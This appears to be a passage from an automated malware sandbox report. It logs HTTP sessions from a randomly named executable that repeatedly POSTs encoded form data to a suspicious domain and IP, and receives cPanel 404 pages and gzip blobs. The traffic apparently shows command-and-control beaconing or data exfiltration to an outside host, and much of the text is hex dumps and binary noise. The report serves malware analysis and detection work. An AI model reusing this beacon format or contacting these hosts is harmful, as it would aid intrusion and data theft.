                                                                                      Data Ascii: 2772<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>404 Not Found</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; [TRUNCATED]
                                                                                      Nov 25, 2024 13:58:32.464755058 CET1236INData Raw: 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63
                                                                                      Data Ascii: } .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text { color: #000000; } .additional-info { background-repeat: no-rep
                                                                                      Nov 25, 2024 13:58:32.464768887 CET1236INData Raw: 2d 69 6d 61 67 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                      Data Ascii: -image { padding: 10px; } .info-heading { font-weight: bold; text-align: left; word-break: break-all; width: 100%; } .info-server address {
                                                                                      Nov 25, 2024 13:58:32.464782000 CET1236INData Raw: 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 69 6d 61 67 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                      Data Ascii: font-size: 18px; } .info-image { float: left; } .info-heading { margin: 62px 0 0 98px; } .info-server address { te
                                                                                      Nov 25, 2024 13:58:32.464793921 CET1236INData Raw: 39 42 34 51 55 7a 73 56 31 58 4b 46 54 7a 44 50 47 2b 4c 66 6f 4c 70 45 2f 4c 6a 4a 6e 7a 4f 30 38 51 43 41 75 67 4c 61 6c 4b 65 71 50 2f 6d 45 6d 57 36 51 6a 2b 42 50 49 45 37 49 59 6d 54 79 77 31 4d 46 77 62 61 6b 73 61 79 62 53 78 44 43 41 34
                                                                                      Data Ascii: 9B4QUzsV1XKFTzDPG+LfoLpE/LjJnzO08QCAugLalKeqP/mEmW6Qj+BPIE7IYmTyw1MFwbaksaybSxDCA4STF+wg8rH7EzMwqNibY38mlvXKDdU5pDH3TRkl40vxJkZ+DO2Nu/3HnyC7t15obGBtqRFRXo6+0Z5YQh5LHd9YGWOsF+9Is5oQXctZKbvdAAtbHHM8+GLfojWdIgPff7YifRTNiZmusW+w8fDj1xdevNnbU3VFfTE
                                                                                      Nov 25, 2024 13:58:32.464806080 CET1236INData Raw: 70 34 56 46 69 4c 38 57 4d 2f 43 6c 38 53 46 34 70 67 74 68 76 74 48 6d 34 71 51 55 49 69 51 64 59 2b 35 4e 4d 66 75 2f 32 32 38 50 6b 71 33 4e 5a 4e 4d 71 44 31 57 37 72 4d 6e 72 77 4a 65 51 45 6d 49 77 4b 73 61 63 4d 49 2f 54 56 4f 4c 6c 48 6a
                                                                                      Data Ascii: p4VFiL8WM/Cl8SF4pgthvtHm4qQUIiQdY+5NMfu/228Pkq3NZNMqD1W7rMnrwJeQEmIwKsacMI/TVOLlHjQjM1YVtVQ3RwhvORo3ckiQ5ZOUzlCOMyi9Z+LXREhS5iqrI4QnuNlf8oVEbK8A556QQK0LNrTj2tiWfcFnh0hPIpYEVGjmBAe2b95U3wMxioiErRm2nuhd8QRCA8IwTRAW1O7PAsbtCPyMMgJp+1/IaxqGARzrFtt
                                                                                      Nov 25, 2024 13:58:32.464816093 CET1236INData Raw: 57 78 51 78 75 6b 6e 67 75 4a 31 53 38 34 41 52 52 34 52 77 41 71 74 6d 61 43 46 5a 6e 52 69 4c 32 6c 62 4d 2b 48 61 41 43 35 6e 70 71 2b 49 77 46 2b 36 68 68 66 42 57 7a 4e 4e 6c 57 36 71 43 72 47 58 52 79 7a 61 30 79 4e 4f 64 31 45 31 66 73 59
                                                                                      Data Ascii: WxQxuknguJ1S84ARR4RwAqtmaCFZnRiL2lbM+HaAC5npq+IwF+6hhfBWzNNlW6qCrGXRyza0yNOd1E1fsYUC7UV2Jop7XyXbsw90KYUInjpkRcecWfkEmdCAehgueuTmNt+shkReKd3v67nP9cNDJHvoD++xdvpovXKCp5SfoGxHsj0yF+IwHUus7smVh8IHVGIwJtLy7uN6Pe/wAnrBxOnAayISLWkQ8woBKyR++dUTsuEK+L8
                                                                                      Nov 25, 2024 13:58:32.464828014 CET1236INData Raw: 6f 6e 20 63 6c 61 73 73 3d 22 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 74 61 74 75 73 2d 63 6f 64 65 22 3e 34 30 34 3c 2f 73 70 61 6e 3e 0a 20 20 20
                                                                                      Data Ascii: on class="response-info"> <span class="status-code">404</span> <span class="status-reason">Not Found</span> </section> <section class="contact-info"> Please forward this
                                                                                      Nov 25, 2024 13:58:32.464842081 CET440INData Raw: 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 63 70 61 6e 65 6c 2e 63 6f 6d 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 63 70 61 6e 65 6c 77 68 6d 26 75 74 6d 5f 6d 65
                                                                                      Data Ascii: ontainer"> <a href="http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404referral" target="cpanel" title="cPanel, Inc."> <img src="/img-sys/powered_by_cpanel.svg" he


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      41192.168.2.84975837.140.192.206806380C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 25, 2024 13:58:38.112246037 CET770OUTPOST /2qq5/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Host: www.iner-tech.online
                                                                                      Origin: http://www.iner-tech.online
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 206
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Referer: http://www.iner-tech.online/2qq5/
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; HM NOTE 1LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
                                                                                      Data Raw: 55 62 52 78 6d 3d 71 4c 4e 76 55 59 6f 4a 53 30 4b 2b 79 4a 4c 32 53 66 72 56 64 31 79 4d 49 56 6e 4e 50 75 43 6c 44 2f 59 69 66 36 63 78 2b 51 49 2b 6b 45 76 42 2b 73 66 44 42 35 35 62 2f 4c 36 6b 4d 6b 79 63 30 34 64 4e 6e 65 48 49 2b 48 64 34 50 51 2b 58 36 4b 71 5a 4c 48 56 4a 31 4f 42 68 2f 2b 5a 6d 76 71 38 50 35 75 38 65 6e 65 71 32 47 70 31 6e 47 55 4a 30 7a 56 48 53 33 5a 49 37 66 39 6d 76 2f 72 57 51 42 6e 47 44 6b 68 31 42 49 50 73 46 79 50 48 53 44 34 47 33 37 6b 55 48 76 72 79 53 6d 6c 79 33 38 42 55 68 30 4c 44 7a 65 38 32 4e 48 36 79 64 63 58 70 50 6a 33 77 2f 41 52 6b 48 32 77 48 53 61 31 77 3d
                                                                                      Data Ascii: UbRxm=qLNvUYoJS0K+yJL2SfrVd1yMIVnNPuClD/Yif6cx+QI+kEvB+sfDB55b/L6kMkyc04dNneHI+Hd4PQ+X6KqZLHVJ1OBh/+Zmvq8P5u8eneq2Gp1nGUJ0zVHS3ZI7f9mv/rWQBnGDkh1BIPsFyPHSD4G37kUHvrySmly38BUh0LDze82NH6ydcXpPj3w/ARkH2wHSa1w=
                                                                                      Nov 25, 2024 13:58:38.491647959 CET770OUTPOST /2qq5/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Host: www.iner-tech.online
                                                                                      Origin: http://www.iner-tech.online
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 206
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Referer: http://www.iner-tech.online/2qq5/
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; HM NOTE 1LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
                                                                                      Data Raw: 55 62 52 78 6d 3d 71 4c 4e 76 55 59 6f 4a 53 30 4b 2b 79 4a 4c 32 53 66 72 56 64 31 79 4d 49 56 6e 4e 50 75 43 6c 44 2f 59 69 66 36 63 78 2b 51 49 2b 6b 45 76 42 2b 73 66 44 42 35 35 62 2f 4c 36 6b 4d 6b 79 63 30 34 64 4e 6e 65 48 49 2b 48 64 34 50 51 2b 58 36 4b 71 5a 4c 48 56 4a 31 4f 42 68 2f 2b 5a 6d 76 71 38 50 35 75 38 65 6e 65 71 32 47 70 31 6e 47 55 4a 30 7a 56 48 53 33 5a 49 37 66 39 6d 76 2f 72 57 51 42 6e 47 44 6b 68 31 42 49 50 73 46 79 50 48 53 44 34 47 33 37 6b 55 48 76 72 79 53 6d 6c 79 33 38 42 55 68 30 4c 44 7a 65 38 32 4e 48 36 79 64 63 58 70 50 6a 33 77 2f 41 52 6b 48 32 77 48 53 61 31 77 3d
                                                                                      Data Ascii: UbRxm=qLNvUYoJS0K+yJL2SfrVd1yMIVnNPuClD/Yif6cx+QI+kEvB+sfDB55b/L6kMkyc04dNneHI+Hd4PQ+X6KqZLHVJ1OBh/+Zmvq8P5u8eneq2Gp1nGUJ0zVHS3ZI7f9mv/rWQBnGDkh1BIPsFyPHSD4G37kUHvrySmly38BUh0LDze82NH6ydcXpPj3w/ARkH2wHSa1w=


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      42192.168.2.84975937.140.192.206806380C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 25, 2024 13:58:40.774378061 CET790OUTPOST /2qq5/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Host: www.iner-tech.online
                                                                                      Origin: http://www.iner-tech.online
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 226
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Referer: http://www.iner-tech.online/2qq5/
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; HM NOTE 1LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
                                                                                      Data Raw: 55 62 52 78 6d 3d 71 4c 4e 76 55 59 6f 4a 53 30 4b 2b 79 70 62 32 65 63 44 56 4d 6c 79 50 48 31 6e 4e 55 65 44 4e 44 2f 45 69 66 34 77 68 2b 6a 67 2b 6a 68 4c 42 2f 6f 4c 44 43 35 35 62 77 72 37 50 43 45 79 58 30 34 51 2b 6e 65 37 49 2b 47 39 34 50 52 4f 58 36 39 32 65 5a 6e 56 4c 30 2b 42 6a 69 75 5a 6d 76 71 38 50 35 71 56 35 6e 65 69 32 47 59 46 6e 46 31 4a 72 36 31 48 64 67 70 49 37 4a 4e 6d 6a 2f 72 57 2b 42 6a 4f 35 6b 6a 39 42 49 4b 6f 46 79 64 76 52 4a 34 47 75 6d 30 56 79 69 72 72 6d 76 45 32 55 30 6e 45 6e 2f 61 4c 36 62 4b 48 6e 64 59 36 62 66 58 42 6b 6a 30 59 4a 46 6d 35 76 73 54 58 69 45 69 6d 6f 73 35 52 4c 74 6f 41 35 57 5a 76 45 52 54 31 67 67 6e 2f 4c
                                                                                      Data Ascii: UbRxm=qLNvUYoJS0K+ypb2ecDVMlyPH1nNUeDND/Eif4wh+jg+jhLB/oLDC55bwr7PCEyX04Q+ne7I+G94PROX692eZnVL0+BjiuZmvq8P5qV5nei2GYFnF1Jr61HdgpI7JNmj/rW+BjO5kj9BIKoFydvRJ4Gum0VyirrmvE2U0nEn/aL6bKHndY6bfXBkj0YJFm5vsTXiEimos5RLtoA5WZvERT1ggn/L
                                                                                      Nov 25, 2024 13:58:42.163389921 CET1236INHTTP/1.1 404 Not Found
                                                                                      Server: nginx
                                                                                      Date: Mon, 25 Nov 2024 12:58:41 GMT
                                                                                      Content-Type: text/html; charset=utf-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Vary: Accept-Encoding
                                                                                      Content-Encoding: gzip
                                                                                      Data Raw: 63 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec bd 5b 73 e3 46 b2 30 f8 ee 5f 41 f1 84 d5 a4 1b 84 70 e7 ad d1 1a 8f a7 7d ec 38 33 b6 63 da 67 26 36 34 0a 05 44 82 22 dc 20 c0 03 80 52 cb 12 4f 6c ec c3 fe 8f 7d dc b7 f3 b0 5f c4 ee c3 be ec 2f 98 ef 1f 6d 66 15 ee 37 16 08 52 ea ee 23 d9 4d 82 40 55 66 65 56 56 56 66 56 55 e2 cd c9 dc 9d 05 f7 6b b3 b3 0c 56 f6 db 37 f8 d9 b1 0d e7 46 ef 7a 9b 6e 67 66 1b be af 77 2d ff ca 98 1b eb c0 ba 35 bb 9d b9 11 18 83 b5 e1 98 f6 60 e3 d9 7a 77 19 04 6b 7f 72 76 e6 9b de ad e9 89 e2 88 5f ba 7e 60 39 37 bc 67 c2 bf cd d9 ca 70 8c 1b d3 eb 02 74 d3 98 bf 7d b3 32 03 a3 33 5b 1a 9e 6f 06 7a f7 df 7f fd 7e 30 ea 86 77 1d 63 65 ea dd 5b cb bc 5b bb 5e 00 f8 5d 27 30 1d 28 75 67 cd 83 a5 3e 37 6f ad 99 39 20 3f 38 cb b1 02 cb b0 07 fe cc b0 4d 5d cc 82 f0 dc 6b 37 f0 53 00 1c d7 72 e6 e6 47 28 15 58 81 6d be fd e7 ff f1 3f ff b7 ff f9 bf fe f3 bf fe f9 ff fe f3 ff fe 9f ff fb 3f ff ab 03 17 ff e3 d4 b9 f6 d7 53 b8 fa af 7f fe 3f ff fc bf fe f9 3f f0 ea cd 19 [TRUNCATED]
                                                                                      Data Ascii: c000[sF0_Ap}83cg&64D" ROl}_/mf7R#M@UfeVVVfVUkV7Fzngfw-5`zwkrv_~`97gpt}23[oz~0wce[[^]'0(ug>7o9 ?8M]k7SrG(Xm??S??m2w=| w3W+wMnla~>]7o|B<U],/rsf:&n*lwOz>m~S-LfY9S2& |=]YYKYa4NcGXD)tCe"JPG3oLbzm>xOeXLw+zExPomx0:u&w"^W{78YZl@a-HC]f|= ul)\x*ht6,k^e`Lvk@eps L5h&kq?;[,LUiL6%Im"E5]c_0wZTvk,D#eMm/POD&p^IVjRUBCIHr]AuHw^Ch"#<,vE+4>R-Ou91rQ [TRUNCATED]
                                                                                      Nov 25, 2024 13:58:42.163436890 CET1236INData Raw: 15 b2 4d 6b 3c 81 d4 b6 93 a9 46 a3 d6 35 26 9d 4c d2 a1 ef 31 f0 03 03 cc 94 b0 89 23 61 8f 89 aa 31 fc 44 6c a2 e9 2d 3d 7c 35 21 91 0d f2 83 d8 62 36 98 bb 03 c2 95 01 82 a7 02 bf 8b f0 18 7c 6c 86 c4 36 5d 67 20 aa 14 74 63 72 d9 a0 16 89 4c
                                                                                      Data Ascii: Mk<F5&L1#a1Dl-=|5!b6|l6]g tcrLcM$vahBZ(13%8Kd%5&A2dl[:J,A<~,1Y.0=D]U9FTTs5L@O)fG:RvWaIEzUe9
                                                                                      Nov 25, 2024 13:58:42.163454056 CET1236INData Raw: 8d f2 b0 0d 75 36 39 b5 be f3 36 b9 28 48 32 93 51 6e df 7c 12 06 b9 5d b2 01 75 b7 31 5e 56 6b 7f 43 3c c3 8a 27 37 c2 23 ec cf 6b 80 37 ec 87 a8 e9 07 34 bc 33 7c 78 6a a3 db 3e ee f6 6c 36 43 b7 61 1f 84 0d 3f 9c a1 9d 61 c2 d3 1b d9 11 fa 67
                                                                                      Data Ascii: u696(H2Qn|]u1^VkC<'7#k743|xj>l6Ca?ag6BCYV<Qfa_$?!36Fn<^a_?e?18lb=3N_g>$g!\k$gTi<G,5\i]r#tQ\-
                                                                                      Nov 25, 2024 13:58:42.163470030 CET1236INData Raw: c5 dc 10 b6 70 fa 0e 68 4f ee 50 35 6e 10 53 e8 bd 1a e8 93 3a 4f ac ed 60 0a d3 d7 c3 7a 72 47 a9 a6 3d bb dc a3 a6 a4 30 85 f5 d9 9a 73 6c 57 a8 be 19 4f ee 00 35 6c 0e 53 cc b2 1a e4 d3 3a 3b cc 0d 61 8a 78 ef 00 f6 e4 8e 4d e3 06 31 c5 c6 ab
                                                                                      Data Ascii: phOP5nS:O`zrG=0slWO5lS:;axM1>LK'vN[R<#E'N3hS;SHP{I&|4s=PJLAZl^N2iIKC7Hy7!
                                                                                      Nov 25, 2024 13:58:42.163496017 CET896INData Raw: 05 bc 33 3b 1c ef 2b 6b 3e b7 cd 29 29 40 df c4 32 11 77 37 66 ea af 4d e3 03 79 e3 46 e1 15 26 e1 fb d6 e8 7d f2 12 11 24 35 55 d6 33 f1 9d 1f 38 de 71 de 9e 02 a2 eb 0f 56 40 09 f0 57 ae 1b 2c c9 33 27 00 ef d2 32 7c 73 3e 1d ac dc df 07 ae ff
                                                                                      Data Ascii: 3;+k>))@2w7fMyF&}$5U38qV@W,3'2|s>1_+h1!3\CfIpmW*({V*_ZC5(VXX6Lu:+**k{S`nTWnA|[U7ms]Zz03rWU-XnV~<iGj5
                                                                                      Nov 25, 2024 13:58:42.163511038 CET1236INData Raw: 28 d7 ea f0 7d c9 e1 ca 05 97 7f 40 a4 38 37 8d a4 96 17 99 f7 a0 17 81 0e 80 0b 2b 17 7a 3b ff da d9 d4 6a 71 36 66 1b 5e 90 90 6a 64 74 e1 6c 92 1b 4f 24 94 dc f6 8c ed 27 d0 de 66 0b e1 a5 dd 59 e7 b7 ef 5a 06 df 0f 20 fb 02 d9 9e 0d 2e f4 0d
                                                                                      Data Ascii: (}@87+z;jq6f^jdtlO$'fYZ .Q*0xC{0K7{Re9]*FEe,qqu(mmY@Ji&E;7WE#wBYwAxU|1s;t`3,@FBRzlsXH,
                                                                                      Nov 25, 2024 13:58:42.163527966 CET1236INData Raw: 50 d6 da b1 62 08 d7 d5 94 c6 55 9b f1 36 ae 56 c9 61 43 36 e6 33 61 37 de 6a 3e 8f d4 b1 6c cc 9a b7 7c 27 b7 e3 9a b5 3c af 60 5c f6 45 2c f4 15 2b d3 62 ed f0 0d 2d 25 55 d9 18 4d cb 56 72 d7 1c 99 d7 8b a2 40 94 63 88 a8 9c d4 a1 4a 78 51 89
                                                                                      Data Ascii: PbU6VaC63a7j>l|'<`\E,+b-%UMVr@cJxQ0IKYii,dDbb0J<wfhq-$S(z1qoRRPE\T5b~vZp!71U?:vg{("4Y}Pb^. Cn
                                                                                      Nov 25, 2024 13:58:42.163542986 CET448INData Raw: 21 9d 2b 79 4a 79 92 50 45 de 6c dc 9d 1b 81 31 21 81 aa 33 ff f6 e6 f5 c7 95 3d 45 db da 37 03 7d 13 2c 06 23 ee 6b f9 3b 78 d0 21 ed d4 5f 89 b2 2c bd ea 50 6a f4 57 92 a8 bd ea 80 1d 6f eb af 50 db bc ea 40 75 c7 d7 5f 2d 83 60 3d 39 3b bb bb
                                                                                      Data Ascii: !+yJyPEl1!3=E7},#k;x!_,PjWoP@u_-`=9;dn$Awqm\*&v<xq8yI:#~4L5~_*wE^U^4RjyY1TyUD3w$_c^beZGxi8k/(^h42W^"U|aS
                                                                                      Nov 25, 2024 13:58:42.163558006 CET1236INData Raw: 70 56 12 c9 4d 65 90 14 50 80 ad d0 f2 11 72 55 54 29 53 45 75 a0 80 44 84 97 22 ca 0d f0 10 f8 2c 03 61 32 b6 7a 0c 02 a0 02 23 c6 44 78 46 82 9c e6 e8 3b f9 9d f6 ee fb 22 47 65 94 9e 61 67 34 82 66 cd 06 40 81 4c 7a 0b f8 2a 2a 80 62 00 5d 34
                                                                                      Data Ascii: pVMePrUT)SEuD",a2z#DxF;"Geag4f@Lz**b]4G"( l PNF2@A0<K:<!P3 @'P4h!(,70P ]WqI[0t8!--Q.[70D48f#c6p~]
                                                                                      Nov 25, 2024 13:58:42.163574934 CET1236INData Raw: c2 0c ad 8d 46 49 fb d0 32 42 e3 1d d8 39 52 6f 65 f4 37 46 3f 48 22 1a 51 7f 93 c0 f4 50 e4 b0 ec f0 16 5c 12 71 3c fc 01 4c e6 f1 70 74 3b 06 13 43 53 7e a0 70 a0 b7 55 7e ac 0d 7f 10 6e c1 a6 06 2b 41 f9 33 f4 1d 78 78 b2 fc 83 a8 01 03 55 68
                                                                                      Data Ascii: FI2B9Roe7F?H"QP\q<Lpt;CS~pU~n+A3xxUh?KIUNSM@?Hm`PET65*l@GA>+Eo6?Cz0,?f_u+]x;X@]!u>CXc
                                                                                      Nov 25, 2024 13:58:42.283670902 CET1236INData Raw: c9 c0 50 77 0f 8c 10 4c 66 5c a8 71 99 25 1d 5e d9 71 31 8c 46 5f 7a 5c 0c c7 65 03 43 4c 8f 0c 63 44 0e 46 e1 47 2c 1a 64 58 a8 44 c6 b4 f0 33 33 2c b4 e2 b0 90 e2 61 21 93 61 11 8a 57 6e 58 8c 92 61 41 0a 10 a9 8f 46 85 56 32 2a d4 d4 a8 d0 88
                                                                                      Data Ascii: PwLf\q%^q1F_z\eCLcDFG,dXD33,a!aWnXaAFV2*ud`lsE<q"82$:gv7$-F'<c`DrV!7FD.`F;:)Lc@fT*`P0?!;2#x


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      43192.168.2.84976037.140.192.206806380C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 25, 2024 13:58:43.448046923 CET1807OUTPOST /2qq5/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Host: www.iner-tech.online
                                                                                      Origin: http://www.iner-tech.online
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 1242
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Referer: http://www.iner-tech.online/2qq5/
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; HM NOTE 1LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
                                                                                      Data Raw: 55 62 52 78 6d 3d 71 4c 4e 76 55 59 6f 4a 53 30 4b 2b 79 70 62 32 65 63 44 56 4d 6c 79 50 48 31 6e 4e 55 65 44 4e 44 2f 45 69 66 34 77 68 2b 6a 34 2b 6a 53 7a 42 2b 4b 6a 44 44 35 35 62 35 4c 37 4d 43 45 79 47 30 34 34 79 6e 65 33 48 2b 44 35 34 50 7a 57 58 72 2f 65 65 41 58 56 4c 2f 65 42 69 2f 2b 5a 4a 76 71 73 4c 35 75 78 35 6e 65 69 32 47 62 74 6e 54 55 4a 72 34 31 48 53 33 5a 49 2f 66 39 6e 2b 2f 72 4f 49 42 6a 44 4f 6c 53 64 42 49 71 34 46 30 6f 7a 52 55 6f 47 73 6e 30 56 71 69 72 58 35 76 45 36 79 30 6e 59 42 2f 64 48 36 59 66 61 72 4a 72 61 39 4b 30 42 6d 36 6a 59 68 42 52 52 2f 75 78 58 51 47 77 6d 64 71 73 64 49 76 35 6b 68 56 71 43 4f 4c 32 49 76 75 7a 53 46 70 76 73 70 44 4e 4c 4b 6d 31 70 4b 39 6c 62 74 56 37 5a 50 72 36 47 4f 41 42 34 57 6f 52 48 4b 52 47 45 72 39 5a 6a 48 42 30 33 68 67 44 46 39 31 4e 58 76 65 6a 48 34 75 71 78 6e 62 7a 41 54 4f 4f 48 50 45 72 33 30 50 34 68 48 65 5a 41 46 73 75 4e 58 35 43 43 44 4f 6b 63 65 38 6e 52 53 49 63 70 4f 31 71 2f 49 51 59 47 6a 45 42 54 46 [TRUNCATED]
                                                                                      Data Ascii: UbRxm=qLNvUYoJS0K+ypb2ecDVMlyPH1nNUeDND/Eif4wh+j4+jSzB+KjDD55b5L7MCEyG044yne3H+D54PzWXr/eeAXVL/eBi/+ZJvqsL5ux5nei2GbtnTUJr41HS3ZI/f9n+/rOIBjDOlSdBIq4F0ozRUoGsn0VqirX5vE6y0nYB/dH6YfarJra9K0Bm6jYhBRR/uxXQGwmdqsdIv5khVqCOL2IvuzSFpvspDNLKm1pK9lbtV7ZPr6GOAB4WoRHKRGEr9ZjHB03hgDF91NXvejH4uqxnbzATOOHPEr30P4hHeZAFsuNX5CCDOkce8nRSIcpO1q/IQYGjEBTFT4R2l6Nhr1sKwrW/3TcP/l6jP+3zUNViy8j9BQsj82ME8ce3RRf0OfrJH+G4JisiG0a3lwv1SGfDb4xZFw5SI23fpqny29StiPUns8hgIKR9y6fM+o/toHQ5xUICxq54+aXqhIsWlOOE75RFKAF7dyLfsxX+DmPRf7jcAqkLMzpO/t022hf9KGzv7q4Lj0whmkxt+JIRbQlRxJ2dNMGwFz09FLrOSZ1Bp+jxTaYmWf+XnqRBwAJEahXrKh4N+/ZiB7dYoVrCuOt0P6lFI657G64Rk4ucnfQ0FGi51rzAPHAXSwPvfAz2W0WbeHC+haxZxRSrTMI19eDEtQ5R6rjywF1xeXD2ekDrTY5epEJ2i99ZWgJBEoXWE+Y8YH705gQpC9CKgjXuZs8esB4LSET3mGn4V9yHWOgDRuid4zpwgMEVHQ5eQ7QcPnrpAGdI8unt7tjFRCccuhRHkha/U209tDmdaN6wCF2lMe7iw51PYIdIpUYemo+rrS2ntwnusqhSjYcYmLeVER8OIElOfd9z1Ih8QrCk1gfMWuRZ5rZs6diOwrK4ReHu2/4OjmVUPJfMJUxMWYGyWddObSNcFNGV39YR/zOZJqL3o2iUX/fnY5ItuvGAHrtBzWNNkSpid9ApfEGJNnC0LBhVDsRTNv8fawvAFtuIZ/HnTS [TRUNCATED]
                                                                                      Nov 25, 2024 13:58:44.833441973 CET1236INHTTP/1.1 404 Not Found
                                                                                      Server: nginx
                                                                                      Date: Mon, 25 Nov 2024 12:58:44 GMT
                                                                                      Content-Type: text/html; charset=utf-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Vary: Accept-Encoding
                                                                                      Content-Encoding: gzip
                                                                                      Data Raw: 63 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec bd 5b 73 e3 46 b2 30 f8 ee 5f 41 f1 84 d5 a4 1b 84 70 e7 ad d1 1a 8f a7 7d ec 38 33 b6 63 da 67 26 36 34 0a 05 44 82 22 dc 20 c0 03 80 52 cb 12 4f 6c ec c3 fe 8f 7d dc b7 f3 b0 5f c4 ee c3 be ec 2f 98 ef 1f 6d 66 15 ee 37 16 08 52 ea ee 23 d9 4d 82 40 55 66 65 56 56 56 66 56 55 e2 cd c9 dc 9d 05 f7 6b b3 b3 0c 56 f6 db 37 f8 d9 b1 0d e7 46 ef 7a 9b 6e 67 66 1b be af 77 2d ff ca 98 1b eb c0 ba 35 bb 9d b9 11 18 83 b5 e1 98 f6 60 e3 d9 7a 77 19 04 6b 7f 72 76 e6 9b de ad e9 89 e2 88 5f ba 7e 60 39 37 bc 67 c2 bf cd d9 ca 70 8c 1b d3 eb 02 74 d3 98 bf 7d b3 32 03 a3 33 5b 1a 9e 6f 06 7a f7 df 7f fd 7e 30 ea 86 77 1d 63 65 ea dd 5b cb bc 5b bb 5e 00 f8 5d 27 30 1d 28 75 67 cd 83 a5 3e 37 6f ad 99 39 20 3f 38 cb b1 02 cb b0 07 fe cc b0 4d 5d cc 82 f0 dc 6b 37 f0 53 00 1c d7 72 e6 e6 47 28 15 58 81 6d be fd e7 ff f1 3f ff b7 ff f9 bf fe f3 bf fe f9 ff fe f3 ff fe 9f ff fb 3f ff ab 03 17 